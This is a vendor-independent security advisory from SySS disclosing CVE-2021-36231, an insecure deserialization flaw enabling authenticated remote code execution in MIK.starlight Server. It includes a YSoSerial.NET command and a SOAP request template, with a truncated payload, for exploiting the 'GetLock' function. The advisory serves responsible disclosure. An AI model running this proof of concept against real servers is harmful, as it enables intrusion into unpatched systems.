-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2021-035
Product:                   MIK.starlight Server
Manufacturer:              MIK GmbH
Affected Version(s):       -
Tested Version(s):         7.9.5.24363
Vulnerability Type:        CWE-502: Deserialization of Untrusted Data 
Risk Level:                Critical
Solution Status:           Open
Manufacturer Notification: 2021-07-02
Solution Date:             -
Public Disclosure:         2021-08-27
CVE Reference:             CVE-2021-36231
Author of Advisory:        Nicola Staller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The MIK.starlight server is a web server that provides the basis for the 
MIK.starlight suite. 

The manufacturer describes the product as follows (see [1]):

"MIK.starlight suite offers exceptional customisable user interfaces
for data analytics and reporting. With our self-service business 
intelligence solutions, users can easily create their own reports or 
adapt existing ones, freeing up time and ensuring optimum flexibility."

Due to deserialization of untrusted user input, it is vulnerable to 
remote code execution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The MIK.starlight server offers a multitude of functions that can be
called through a WCF endpoint. One of them is the function "GetLock". 
The function deserializes user input in an insecure way and therefore
enables remote code execution. 
Other functions are exploitable in the same way.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The tool YSoSerial.NET [4] is used to generate a payload executing an 
operating system command:

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "<COMMAND>"

Next, the vulnerable function "GetLock" is called. The output of 
YSoSerial.NET is sent in the parameter "serializedResourceSpec"
and will lead to the desired operating system command being 
executed on the server. 

Note that an authenticated user is necessary.


POST /MikStarLightWCF/MikStarLightWCFService HTTP/1.1
Accept: */*
Accept-Language: de-DE
Content-Length: 5472
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IMikStarLightWCFService/GetLock"
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko
Host: IP:PORT
Pragma: no-cache
Connection: close
Proxy-Connection: Keep-Alive

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <GetLock xmlns="http://tempuri.org/">
	<sessioninfos xmlns:d4p1="http://schemas.datacontract.org/2004/07/MikStarLightBase.Project" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
        <d4p1:Designer>false</d4p1:Designer>
        <d4p1:Id2>##########</d4p1:Id2>
        <d4p1:MUid i:nil="true" />
        <d4p1:SessionID>##########</d4p1:SessionID>
        <d4p1:UserName>USERNAME</d4p1:UserName>
       </sessioninfos>
	<serializedResourceSpec>AAEAAAD/////AQAAAAA....[...]....YAAAACRYAAAAKCw==</serializedResourceSpec> 
      <lang>0</lang>
      <b1>false</b1>
      <s1></s1>
    </GetLock>
  </s:Body>
</s:Envelope>


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS is not aware of a solution for the described security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-02: Vulnerability reported to manufacturer
2021-08-27: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for MIK.starlight
    https://www.mik.de/starlight-bi-suite-2/
[2] SySS Security Advisory SYSS-2021-035
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-035.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] YSoSerial.Net
    https://github.com/pwntester/ysoserial.net

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Nicola Staller of SySS 
GmbH.

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x41DD2290
Key Fingerprint: A127 394A F398 B097 2332  637C 9DF3 39F9 41DD 2290  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSc5SvOYsJcjMmN8nfM5+UHdIpAFAmEnTwQACgkQnfM5+UHd
IpAHlQ//R6xkXzIfWL+HYKY2gpyGgD36pxFpXGaRViNtamN5X3lTC0pgtS6nBf5H
+Qo2yolm5JGvnU7CMs0QfwuN9aw++NOVedjHtmQjwKg/SidGt+cpoDwBmxAKtwgo
NoLAsGroJoza8pnIHeSno7M+Em7T3sufNfngNmD2SKNlLw6zL940aafKmPwKPfnV
1GR6nDnPbXZJp876wwoVPDSeY7q5ZMTlGzRbJrTPYydmOtKKtCK19Z7YMXuM1iZD
tUKppBkN/YRjiQL11/sR8HyMCIALPNnRyd1SOL+mLOgYJ5BOLnDrAAP5pKRxpPBg
asZ9zw6PxWKfKxrQ3KSsnlHbkJZigJ9nggpSVrseP3JmnAuHCynxFPSFHsdXRABs
W+7PHI2th3BhAlzb6bwBrsN9f9VMW5YBuv2v+uqrkbHtI7JwwGnoCmrWbeB8r1Gc
2zfJEdjOBzqO8S51ww/IaFD2moq9WO9nvviBDrs6X2/gCuy16by60ZLsyMoftQBK
hec5f5bJ1NgKTVb4e4qQckbxbAS9tEzc3sOUrKPmBx0LRju4+qKUtLtURthZfZrB
/6i+W8dIM77X/3w6wcV4DODco/4qbLLQjHJ6AQZwcJxXkvCpfUQBh1E9BbL1BI/B
Qp9cnHJYtuGhu3Zaa8w/Eb0Du/7tD30nuX93J+33AIxNQRkEhiY=
=gJnP
-----END PGP SIGNATURE-----